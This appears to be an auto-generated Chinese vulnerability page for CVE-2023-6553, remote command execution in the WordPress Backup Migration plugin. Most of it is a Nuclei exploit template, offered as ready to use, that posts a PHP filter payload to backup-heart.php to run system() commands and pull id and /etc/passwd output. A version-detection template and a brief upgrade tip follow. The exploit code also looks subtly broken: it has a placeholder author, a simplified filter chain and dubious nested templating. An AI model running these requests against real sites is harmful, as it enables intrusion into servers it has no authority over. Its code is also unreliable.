[webapps] WordPress Backup Migration 1.3.7 - Remote Command Execution
CVE-2023-6553
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2023-6553 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-03-03 |
| 提交者 | DANG |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2023-6553-exploit
info:
name: WordPress Backup Migration RCE Exploit
author: yourname
severity: critical
description: Exploits Remote Command Execution in WordPress Backup Migration plugin <= 1.3.7 via PHP Filter Chain
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6553
- https://www.exploit-db.com/exploits/52031
- https://github.com/Chocapikk/CVE-2023-6553
tags: wordpress,wp-plugin,rce,backup-migration
classification:
cve-id: CVE-2023-6553
cwe-id: CWE-94
variables:
cmd: 'id'
http:
- raw:
- |
POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Host: {{Hostname}}
Content-Dir: {{php_filter_payload}}
Content-Type: application/x-www-form-urlencoded
Connection: close
{{base64_encode(cmd)}}
payloads:
php_filter_payload: "php://filter/convert.base64-encode/resource=php://temp"
- raw:
- |
POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
Host: {{Hostname}}
Content-Dir: php://filter/convert.base64-decode/resource=php://temp
Content-Type: application/x-www-form-urlencoded
Connection: close
{{base64('<?php system("{{cmd}}");?>')}}
matchers:
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- '(uid=[0-9]+\([a-zA-Z0-9_]+\) gid=[0-9]+\([a-zA-Z0-9_]+\))'
- '(root:[^:]+:[0-9]+:[0-9]+:.*)'
group: 1
internal: false🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2023-6553-detection
info:
name: WordPress Backup Migration Plugin Detection
author: yourname
severity: high
description: Detects WordPress Backup Migration plugin version <= 1.3.7
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6553
- https://www.exploit-db.com/exploits/52031
tags: wordpress,wp-plugin,backup-migration
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt'
- '{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Backup Migration'
- 'backup-backup'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'Stable tag: ([0-9.]+)'
- 'Version ([0-9.]+)'
group: 1
- method: POST
path:
- '{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php'
headers:
Content-Dir: 'test'
matchers:
- type: status
status:
- 200
- 500
condition: or
- type: word
part: body
words:
- 'error'
- 'success'
condition: or
matchers-condition: and🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:52 | 来源: Exploit-DB